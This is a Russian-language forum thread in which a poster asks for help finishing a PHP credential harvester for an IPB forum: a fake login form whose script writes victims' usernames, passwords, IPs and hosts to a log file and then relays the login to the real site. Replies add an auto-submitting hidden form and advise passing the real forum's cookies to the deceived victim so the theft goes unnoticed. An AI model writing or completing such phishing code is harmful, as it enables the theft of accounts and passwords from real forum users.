Авторизация на форуме через Curl

Статус
В этой теме нельзя размещать новые ответы.
F

FroshaS

Создатель
Регистрация
14 Мар 2009
Сообщения
29
Реакции
2
Составляю с помощью PHP сниффер для перехвата паролей с форума IPB 2.3.6.
Формочку составил, проблема осталась с авторизацией и переадресацией на настоящий форум.
То есть на настоящем форуме хочу поменять формочку авторизацию, чтобы пароли улетали на фейковый адрес, сохранялись, а затем происходила авторизация.
Получилось, примерно так. Но авторизации не происходит.
PHP: 
<?PHP 
if (isset($_POST['UserName']) and isset($_POST['PassWord']));
$Login = $_POST['UserName']; 
$Pass = $_POST['PassWord']; 
$text = "Логин:$Login Пасс:$Pass";
$Port = getenv("REMOTE_PORT");
$Connect = $_SERVER['HTTP_CONNECTION'];
$Host = gethostbyaddr(getenv("REMOTE_ADDR")); 
$Pass = $_POST['PassWord']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время

$text = "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip  Login:$Login Пасс:$Pass";
$filelog = fopen("base.php","a+"); //открываем файл базы
fwrite($filelog,"\n $text \n"); //записываем всё

fclose($filelog); //закрываем

set_time_limit(0); 


$Login = $_POST['UserName']; 
$Pass = $_POST['PassWord']; 
$hostname="www.feik.ru";
$path="/fopur/index.php?act=Login&CODE=01"; 
$fp = fsockopen($hostname,80);  
if(!$fp){ 
echo"Ошибка подключения"; 
} 
else{  
$data = "index.php?act=Login&CODE=01\r\n\r\n"; // отправляемые даные! 
$headers = "POST $path HTTP/1.1\r\n";  
$headers .= "Host: realsite.ru\r\n";  
$headers .= "Connection: close\r\n";  
$headers .= "User-Agent: Opera/9.20 (Windows NT 6.0; U; en)\r\n";  
$headers .= "Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,* /*;q=0.5\r\n";  
$headers .= "Accept-Language: en-us,en;q=0.5\r\n";  
$headers .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";  
$headers .= "Referer: http://realsite.ru/forum/index.php\r\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n";  
  $headers .= "Content-Length: ".strlen($data)."\r\n\r\n";  

fputs($fp,$headers.$data);  

while(!feof($fp)) 
 { 
 
$a=fread($fp,1000);
echo $a;
 }
 }
   
fclose($fp);  

?>
<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://realsite.ru/forum/index.php?act=Login&CODE=01'></head></html>;
?>
 
а если сделать так?:
PHP: 
//тут перехватываем данные
...
// а затем происходит простая переадресация на javascript на настоящий форум
echo "<form name='form1' method='post' action='http://realsite.ru/forum/index.php'>
<input type='hidden' value='".$Login."' name='Login'>
<input type='hidden' value='".$Pass."' name='Pass'> 
Выполняется переадресация. Если этого не происходит, <input type='submit' value='нажмите сюда'>
<script>
document.form1.submit();
</script>
</form>";
 
1. Нафиг ты юзаешь сокеты, а в теме написано, что через курл?
2. Для авторизации, тебе нужно отправить запрос на страницу IPB, потом спарсить из заголовков Set-Cookie и выплюнуть их все клиенту, который попался на фейк.
3. Переадрисовать редиректом на главную страницу форума.
 
ага с кукиесам поразбирайся в curl-е
вполне можно реализовать
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху